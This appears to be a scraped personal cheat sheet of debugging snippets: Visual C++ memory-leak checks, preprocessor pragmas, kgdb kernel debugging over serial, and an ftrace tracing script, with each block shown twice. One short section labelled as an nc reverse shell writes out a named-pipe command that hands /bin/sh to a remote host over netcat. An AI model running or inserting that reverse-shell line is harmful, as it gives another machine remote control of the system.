1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
| _CrtSetBreakAlloc(12683);
OutputDebugString("hi");
DebugBreak();
#define _CRTDBG_MAP_ALLOC
#include <crtdbg.h>
_CrtSetDbgFlag(_CrtSetDbgFlag(_CRTDBG_REPORT_FLAG) | _CRTDBG_LEAK_CHECK_DF);
_CrtSetReportMode(_CRT_ERROR, _CRTDBG_MODE_DEBUG);
#pragma warning(disable:4996)
#ifdef WIN32
#pragma message("message body")
#else
#warning "message body"
#endif
Project->settings->C/C++->Preprocessor->Project options->/P
#define new new(_NORMAL_BLOCK, __FILE__, __LINE__)
sysdig -c spy_users
sed 's/^.\{22\}//'
\\.\pipe\com_1
quiet kgdbwait kgdboc=ttyS0,115200
echo g > /proc/sysrq-trigger
set auto-load safe-path .
gdb /usr/src/kernels/linux-2.6.32.27/vmlinux
(gdb) target remote /dev/ttyS0 |
_CrtSetBreakAlloc(12683);
OutputDebugString("hi");
DebugBreak();
#define _CRTDBG_MAP_ALLOC
#include <crtdbg.h>
_CrtSetDbgFlag(_CrtSetDbgFlag(_CRTDBG_REPORT_FLAG) | _CRTDBG_LEAK_CHECK_DF);
_CrtSetReportMode(_CRT_ERROR, _CRTDBG_MODE_DEBUG);
#pragma warning(disable:4996)
#ifdef WIN32
#pragma message("message body")
#else
#warning "message body"
#endif
Project->settings->C/C++->Preprocessor->Project options->/P
#define new new(_NORMAL_BLOCK, __FILE__, __LINE__)
sysdig -c spy_users
sed 's/^.\{22\}//'
\\.\pipe\com_1
quiet kgdbwait kgdboc=ttyS0,115200
echo g > /proc/sysrq-trigger
set auto-load safe-path .
gdb /usr/src/kernels/linux-2.6.32.27/vmlinux
(gdb) target remote /dev/ttyS0
nc反弹shell
1
2
| mknod /tmp/bp p
/bin/sh 0</tmp/bp | nc 192.168.1.38 5555 1>/tmp/bp |
mknod /tmp/bp p
/bin/sh 0</tmp/bp | nc 192.168.1.38 5555 1>/tmp/bp
1
2
3
4
5
6
7
8
9
10
11
12
13
| #!/bin/bash
debugfs=/sys/kernel/debug
echo nop > $debugfs/tracing/current_tracer
echo 0 > $debugfs/tracing/tracing_on
echo $$ > $debugfs/tracing/set_ftrace_pid
echo function_graph > $debugfs/tracing/current_tracer
#replace test_proc_show by your function name
echo vfs_read > $debugfs/tracing/set_graph_function
echo 1 > $debugfs/tracing/tracing_on
exec "$@" |
#!/bin/bash
debugfs=/sys/kernel/debug
echo nop > $debugfs/tracing/current_tracer
echo 0 > $debugfs/tracing/tracing_on
echo $$ > $debugfs/tracing/set_ftrace_pid
echo function_graph > $debugfs/tracing/current_tracer
#replace test_proc_show by your function name
echo vfs_read > $debugfs/tracing/set_graph_function
echo 1 > $debugfs/tracing/tracing_on
exec "$@"